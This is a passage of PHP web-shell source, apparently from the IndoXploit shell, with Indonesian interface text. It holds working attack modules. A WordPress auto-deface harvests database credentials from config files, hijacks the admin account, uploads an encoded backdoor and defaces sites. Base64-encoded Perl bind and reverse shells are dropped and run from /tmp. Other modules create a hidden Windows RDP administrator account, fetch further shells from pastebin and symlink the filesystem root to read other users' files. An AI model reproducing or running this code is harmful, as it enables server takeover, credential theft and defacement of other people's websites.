1484. if(file_exists('adminer.php')) {
1485. echo "<center><font color=green><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1486. } else {
1487. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
1488. echo "<center><font color=green><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
1489. } else {
1490. echo "<center><font color=red>gagal buat file adminer</font></center>";
1491. }
1492. }
1493. } elseif($_GET['do'] == 'auto_dwp') {
1494. if($_POST['auto_deface_wp']) {
1495. function anucurl($sites) {
1496. $ch = curl_init($sites);
1497. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1498. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1499. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1500. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1501. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1502. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1503. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1504. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1505. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1506. $data = curl_exec($ch);
1507. curl_close($ch);
1508. return $data;
1509. }
1510. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1511. $post = array(
1512. "log" => "$userr",
1513. "pwd" => "$pass",
1514. "rememberme" => "forever",
1515. "wp-submit" => "$wp_submit",
1516. "redirect_to" => "$web",
1517. "testcookie" => "1",
1518. );
1519. $ch = curl_init($cek);
1520. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1521. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1522. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1523. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1524. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1525. curl_setopt($ch, CURLOPT_POST, 1);
1526. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1527. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1528. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1529. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1530. $data = curl_exec($ch);
1531. curl_close($ch);
1532. return $data;
1533. }
1534. $scan = $_POST['link_config'];
1535. $link_config = scandir($scan);
1536. $script = htmlspecialchars($_POST['script']);
1537. $user = "indoxploit";
1538. $pass = "indoxploit";
1539. $passx = md5($pass);
1540. foreach($link_config as $dir_config) {
1541. if(!is_file("$scan/$dir_config")) continue;
1542. $config = file_get_contents("$scan/$dir_config");
1543. if(preg_match("/WordPress/", $config)) {
1544. $dbhost = ambilkata($config,"DB_HOST', '","'");
1545. $dbuser = ambilkata($config,"DB_USER', '","'");
1546. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1547. $dbname = ambilkata($config,"DB_NAME', '","'");
1548. $dbprefix = ambilkata($config,"table_prefix = '","'");
1549. $prefix = $dbprefix."users";
1550. $option = $dbprefix."options";
1551. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1552. $db = mysql_select_db($dbname);
1553. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1554. $result = mysql_fetch_array($q);
1555. $id = $result[ID];
1556. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1557. $result2 = mysql_fetch_array($q2);
1558. $target = $result2[option_value];
1559. if($target == '') {
1560. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1561. } else {
1562. echo "[+] $target <br>";
1563. }
1564. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1565. if(!$conn OR !$db OR !$update) {
1566. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1567. mysql_close($conn);
1568. } else {
1569. $site = "$target/wp-login.php";
1570. $site2 = "$target/wp-admin/theme-install.php?upload";
1571. $b1 = anucurl($site2);
1572. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1573. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1574. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1575. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1576. $www = "m.php";
1577. $fp5 = fopen($www,"w");
1578. fputs($fp5,$upload3);
1579. $post2 = array(
1580. "_wpnonce" => "$anu2",
1581. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1582. "themezip" => "@$www",
1583. "install-theme-submit" => "Install Now",
1584. );
1585. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1586. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1587. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1588. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1589. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1590. curl_setopt($ch, CURLOPT_POST, 1);
1591. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1592. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1593. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1594. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1595. $data3 = curl_exec($ch);
1596. curl_close($ch);
1597. $y = date("Y");
1598. $m = date("m");
1599. $namafile = "id.php";
1600. $fpi = fopen($namafile,"w");
1601. fputs($fpi,$script);
1602. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1603. curl_setopt($ch6, CURLOPT_POST, true);
1604. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1605. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1606. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1607. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1608. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1609. $postResult = curl_exec($ch6);
1610. curl_close($ch6);
1611. $as = "$target/k.php";
1612. $bs = anucurl($as);
1613. if(preg_match("#$script#is", $bs)) {
1614. echo "[+] <font color='green'>berhasil mepes...</font><br>";
1615. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1616. } else {
1617. echo "[-] <font color='red'>gagal mepes...</font><br>";
1618. echo "[!!] coba aja manual: <br>";
1619. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1620. echo "[+] username: <font color=green>$user</font><br>";
1621. echo "[+] password: <font color=green>$pass</font><br><br>";
1622. }
1623. mysql_close($conn);
1624. }
1625. }
1626. }
1627. } else {
1628. echo "<center><h1>WordPress Auto Deface</h1>
1629. <form method='post'>
1630. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1631. <input type='text' name='script' height='10' size='50' placeholder='HACKED BY HO4R KOD3' required><br>
1632. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Submit !!!'>
1633. </form>
1634. <br><span>NB: These Tools Work if They Run Inside The Config Folder( EX: /home/user/public_html/nama_folder_config )</span>
1635. </center>";
1636. }
1637. } elseif($_GET['do'] == 'auto_dwp2') {
1638. if($_POST['auto_deface_wp']) {
1639. function anucurl($sites) {
1640. $ch = curl_init($sites);
1641. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1642. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1643. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1644. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1645. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1646. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1647. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1648. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1649. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1650. $data = curl_exec($ch);
1651. curl_close($ch);
1652. return $data;
1653. }
1654. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1655. $post = array(
1656. "log" => "$userr",
1657. "pwd" => "$pass",
1658. "rememberme" => "forever",
1659. "wp-submit" => "$wp_submit",
1660. "redirect_to" => "$web",
1661. "testcookie" => "1",
1662. );
1663. $ch = curl_init($cek);
1664. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1665. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1666. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1667. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1668. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1669. curl_setopt($ch, CURLOPT_POST, 1);
1670. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1671. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1672. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1673. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1674. $data = curl_exec($ch);
1675. curl_close($ch);
1676. return $data;
1677. }
1678. $link = explode("\r\n", $_POST['link']);
1679. $script = htmlspecialchars($_POST['script']);
1680. $user = "indoxploit";
1681. $pass = "indoxploit";
1682. $passx = md5($pass);
1683. foreach($link as $dir_config) {
1684. $config = anucurl($dir_config);
1685. $dbhost = ambilkata($config,"DB_HOST', '","'");
1686. $dbuser = ambilkata($config,"DB_USER', '","'");
1687. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1688. $dbname = ambilkata($config,"DB_NAME', '","'");
1689. $dbprefix = ambilkata($config,"table_prefix = '","'");
1690. $prefix = $dbprefix."users";
1691. $option = $dbprefix."options";
1692. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1693. $db = mysql_select_db($dbname);
1694. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1695. $result = mysql_fetch_array($q);
1696. $id = $result[ID];
1697. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1698. $result2 = mysql_fetch_array($q2);
1699. $target = $result2[option_value];
1700. if($target == '') {
1701. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1702. } else {
1703. echo "[+] $target <br>";
1704. }
1705. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1706. if(!$conn OR !$db OR !$update) {
1707. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1708. mysql_close($conn);
1709. } else {
1710. $site = "$target/wp-login.php";
1711. $site2 = "$target/wp-admin/theme-install.php?upload";
1712. $b1 = anucurl($site2);
1713. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1714. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1715. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1716. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1717. $www = "m.php";
1718. $fp5 = fopen($www,"w");
1719. fputs($fp5,$upload3);
1720. $post2 = array(
1721. "_wpnonce" => "$anu2",
1722. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1723. "themezip" => "@$www",
1724. "install-theme-submit" => "Install Now",
1725. );
1726. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1727. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1728. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1729. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1730. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1731. curl_setopt($ch, CURLOPT_POST, 1);
1732. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1733. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1734. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1735. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1736. $data3 = curl_exec($ch);
1737. curl_close($ch);
1738. $y = date("Y");
1739. $m = date("m");
1740. $namafile = "id.php";
1741. $fpi = fopen($namafile,"w");
1742. fputs($fpi,$script);
1743. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1744. curl_setopt($ch6, CURLOPT_POST, true);
1745. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1746. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1747. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1748. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1749. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1750. $postResult = curl_exec($ch6);
1751. curl_close($ch6);
1752. $as = "$target/k.php";
1753. $bs = anucurl($as);
1754. if(preg_match("#$script#is", $bs)) {
1755. echo "[+] <font color='green'>berhasil mepes...</font><br>";
1756. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1757. } else {
1758. echo "[-] <font color='red'>gagal mepes...</font><br>";
1759. echo "[!!] coba aja manual: <br>";
1760. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1761. echo "[+] username: <font color=green>$user</font><br>";
1762. echo "[+] password: <font color=green>$pass</font><br><br>";
1763. }
1764. mysql_close($conn);
1765. }
1766. }
1767. } else {
1768. echo "<center><h1>WordPress Auto Deface V.2</h1>
1769. <form method='post'>
1770. Link Config: <br>
1771. <textarea name='link' placeholder='http://target.com/Hoar_Configs/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1772. <input type='text' name='script' height='10' size='50' placeholder='HACKED BY HO4R KOD3' required><br>
1773. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1774. </form></center>";
1775. }
1776. } elseif($_GET['do'] == 'network') {
1777. echo "<form method='post'>
1778. <u>Bind Port:</u> <br>
1779. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1780. <input type='submit' name='sub_bp' value='>>'>
1781. </form>
1782. <form method='post'>
1783. <u>Back Connect:</u> <br>
1784. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1785. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1786. <input type='submit' name='sub_bc' value='>>'>
1787. </form>";
1788. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1789. if(isset($_POST['sub_bp'])) {
1790. $f_bp = fopen("/tmp/bp.pl", "w");
1791. fwrite($f_bp, base64_decode($bind_port_p));
1792. fclose($f_bp);
1793.  
1794. $port = $_POST['port_bind'];
1795. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1796. sleep(1);
1797. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1798. unlink("/tmp/bp.pl");
1799. }
1800. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1801. if(isset($_POST['sub_bc'])) {
1802. $f_bc = fopen("/tmp/bc.pl", "w");
1803. fwrite($f_bc, base64_decode($bind_connect_p));
1804. fclose($f_bc);
1805.  
1806. $ipbc = $_POST['ip_bc'];
1807. $port = $_POST['port_bc'];
1808. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1809. sleep(1);
1810. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1811. unlink("/tmp/bc.pl");
1812.  
1813. }
1814. } elseif($_GET['do'] == 'krdp_shell') {
1815. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1816. if($_POST['create']) {
1817. $user = htmlspecialchars($_POST['user']);
1818. $pass = htmlspecialchars($_POST['pass']);
1819. if(preg_match("/$user/", exe("net user"))) {
1820. echo "[INFO] -> <font color=red>user <font color=green>$user</font> sudah ada</font>";
1821. } else {
1822. $add_user = exe("net user $user $pass /add");
1823. $add_groups1 = exe("net localgroup Administrators $user /add");
1824. $add_groups2 = exe("net localgroup Administrator $user /add");
1825. $add_groups3 = exe("net localgroup Administrateur $user /add");
1826. echo "[ RDP ACCOUNT INFO ]<br>
1827. ------------------------------<br>
1828. IP: <font color=green>".$ip."</font><br>
1829. Username: <font color=green>$user</font><br>
1830. Password: <font color=green>$pass</font><br>
1831. ------------------------------<br><br>
1832. [ STATUS ]<br>
1833. ------------------------------<br>
1834. ";
1835. if($add_user) {
1836. echo "[add user] -> <font color='green'>Berhasil</font><br>";
1837. } else {
1838. echo "[add user] -> <font color='red'>Gagal</font><br>";
1839. }
1840. if($add_groups1) {
1841. echo "[add localgroup Administrators] -> <font color='green'>Berhasil</font><br>";
1842. } elseif($add_groups2) {
1843. echo "[add localgroup Administrator] -> <font color='green'>Berhasil</font><br>";
1844. } elseif($add_groups3) {
1845. echo "[add localgroup Administrateur] -> <font color='green'>Berhasil</font><br>";
1846. } else {
1847. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1848. }
1849. echo "------------------------------<br>";
1850. }
1851. } elseif($_POST['s_opsi']) {
1852. $user = htmlspecialchars($_POST['r_user']);
1853. if($_POST['opsi'] == '1') {
1854. $cek = exe("net user $user");
1855. echo "Checking username <font color=green>$user</font> ....... ";
1856. if(preg_match("/$user/", $cek)) {
1857. echo "[ <font color=green>Sudah ada</font> ]<br>
1858. ------------------------------<br><br>
1859. <pre>$cek</pre>";
1860. } else {
1861. echo "[ <font color=red>belum ada</font> ]";
1862. }
1863. } elseif($_POST['opsi'] == '2') {
1864. $cek = exe("net user $user indoxploit");
1865. if(preg_match("/$user/", exe("net user"))) {
1866. echo "[change password: <font color=green>indoxploit</font>] -> ";
1867. if($cek) {
1868. echo "<font color=green>Berhasil</font>";
1869. } else {
1870. echo "<font color=red>Gagal</font>";
1871. }
1872. } else {
1873. echo "[INFO] -> <font color=red>user <font color=green>$user</font> belum ada</font>";
1874. }
1875. } elseif($_POST['opsi'] == '3') {
1876. $cek = exe("net user $user /DELETE");
1877. if(preg_match("/$user/", exe("net user"))) {
1878. echo "[remove user: <font color=green>$user</font>] -> ";
1879. if($cek) {
1880. echo "<font color=green>Berhasil</font>";
1881. } else {
1882. echo "<font color=red>Gagal</font>";
1883. }
1884. } else {
1885. echo "[INFO] -> <font color=red>user <font color=green>$user</font> belum ada</font>";
1886. }
1887. } else {
1888. //
1889. }
1890. } else {
1891. echo "-- Create RDP --<br>
1892. <form method='post'>
1893. <input type='text' name='user' placeholder='username' value='indoxploit' required>
1894. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
1895. <input type='submit' name='create' value='>>'>
1896. </form>
1897. -- Option --<br>
1898. <form method='post'>
1899. <input type='text' name='r_user' placeholder='username' required>
1900. <select name='opsi'>
1901. <option value='1'>Cek Username</option>
1902. <option value='2'>Ubah Password</option>
1903. <option value='3'>Hapus Username</option>
1904. </select>
1905. <input type='submit' name='s_opsi' value='>>'>
1906. </form>
1907. ";
1908. }
1909. } else {
1910. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1911. }
1912. }
1913. elseif($_GET['do'] == 'sym') {
1914. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1915. function adminer($url, $isi) {
1916. $fp = fopen($isi, "w");
1917. $ch = curl_init();
1918. curl_setopt($ch, CURLOPT_URL, $url);
1919. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1920. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1921. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1922. curl_setopt($ch, CURLOPT_FILE, $fp);
1923. return curl_exec($ch);
1924. curl_close($ch);
1925. fclose($fp);
1926. ob_flush();
1927. flush();
1928. }
1929. if(file_exists('sym.php')) {
1930. echo "<center><font color=green><a href='$full/sym.php' target='_blank'>-> Link to Symlinker <-</a></font></center>";
1931. } else {
1932. if(adminer("https://pastebin.com/raw/844zA2Qg","sym.php")) {
1933. echo "<center><font color=green><a href='$full/sym.php' target='_blank'>->Link to Symlinker<-</a></font></center>";
1934. } else {
1935. echo "<center><font color=red>gagal buat file sym.php</font></center>";
1936. }
1937. }
1938. }
1939. elseif($_GET['do'] == 'mini') {
1940. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1941. function adminer($url, $isi) {
1942. $fp = fopen($isi, "w");
1943. $ch = curl_init();
1944. curl_setopt($ch, CURLOPT_URL, $url);
1945. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
1946. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1947. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
1948. curl_setopt($ch, CURLOPT_FILE, $fp);
1949. return curl_exec($ch);
1950. curl_close($ch);
1951. fclose($fp);
1952. ob_flush();
1953. flush();
1954. }
1955. if(file_exists('mini.php')) {
1956. echo "<center><font color=green><a href='$full/mini.php' target='_blank'>-> Link to Mini Shell <-</a></font></center>";
1957. } else {
1958. if(adminer("https://pastebin.com/raw/A7hge1zE","mini.php")) {
1959. echo "<center><font color=green><a href='$full/mini.php' target='_blank'>->Link to Mini Shell<-</a></font></center>";
1960. } else {
1961. echo "<center><font color=red>gagal buat file mini.php</font></center>";
1962. }
1963. }
1964. }
1965.  
1966.  
1967. elseif($_GET['do'] == 'symlink') {
1968. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
1969. $d0mains = @file("/etc/named.conf");
1970. ##httaces
1971. if($d0mains){
1972. @mkdir("kod3_SYMLINK",0777);
1973. @chdir("kod3_SYMLINK");
1974. @exe("ln -s / root");
1975. $file3 = 'Options Indexes FollowSymLinks
1976. DirectoryIndex Berandal.htm
1977. AddType text/plain .php
1978. AddHandler text/plain .php
1979. Satisfy Any';
1980. $fp3 = fopen('.htaccess','w');
1981. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
1982. echo "
1983. <table align=center border=1 style='width:60%;border-color:#333333;'>
1984. <tr>
1985. <td align=center><font size=2>S. No.</font></td>
1986. <td align=center><font size=2>Domains</font></td>
1987. <td align=center><font size=2>Users</font></td>
1988. <td align=center><font size=2>Symlink</font></td>
1989. </tr>";
1990. $dcount = 1;
1991. foreach($d0mains as $d0main){
1992. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
1993. flush();
1994. if(strlen(trim($domains[1][0])) > 2){
1995. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1996. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
1997. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
1998. <td>".$user['name']."</td>
1999. <td><a href='$full/kod3_SYMLINK/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2000. flush();
2001. $dcount++;}}}
2002. echo "</table>";
2003. }else{
2004. $TEST=@file('/etc/passwd');
2005. if ($TEST){
2006. @mkdir("kod3_SYMLINK",0777);
2007. @chdir("kod3_SYMLINK");
2008. exe("ln -s / root");
2009. $file3 = 'Options Indexes FollowSymLinks
2010. DirectoryIndex Berandal.htm
2011. AddType text/plain .php
2012. AddHandler text/plain .php
2013. Satisfy Any';
2014. $fp3 = fopen('.htaccess','w');
2015. $fw3 = fwrite($fp3,$file3);
2016. @fclose($fp3);
2017. echo "
2018. <table align=center border=1><tr>
2019. <td align=center><font size=3>S. No.</font></td>
2020. <td align=center><font size=3>Users</font></td>
2021. <td align=center><font size=3>Symlink</font></td></tr>";
2022. $dcount = 1;
2023. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2024. while(!feof($file)){
2025. $s = fgets($file);
2026. $matches = array();
2027. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2028. $matches = str_replace("home/","",$matches[1]);
2029. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2030. continue;
2031. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2032. <td align=center><font class=txt>" . $matches . "</td>";
2033. echo "<td align=center><font class=txt><a href=$full/kod3_SYMLINK/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2034. $dcount++;}fclose($file);
2035. echo "</table>";}else{if($os != "Windows"){@mkdir("kod3_SYMLINK",0777);@chdir("kod3_SYMLINK");@exe("ln -s / root");$file3 = '
2036. Options Indexes FollowSymLinks
2037. DirectoryIndex berandal.htm
2038. AddType text/plain .php
2039. AddHandler text/plain .php
2040. Satisfy Any
2041. ';
2042. $fp3 = fopen('.htaccess','w');
2043. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2044. echo "
2045. <div class='mybox'><h2 class='Berandal'>Server Symlinker</h2>
2046. <table align=center border=1><tr>
2047. <td align=center><font size=3>ID</font></td>
2048. <td align=center><font size=3>Users</font></td>
2049. <td align=center><font size=3>Symlink</font></td></tr>";
2050. $temp = "";$val1 = 0;$val2 = 1000;
2051. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2052. if ($uid)$temp .= join(':',$uid)."\n";}
2053. echo '<br/>';$temp = trim($temp);$file5 =
2054. fopen("test.txt","w");
2055. fputs($file5,$temp);
2056. fclose($file5);$dcount = 1;$file =
2057. fopen("test.txt", "r") or exit("Unable to open file!");
2058. while(!feof($file)){$s = fgets($file);$matches = array();
2059. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
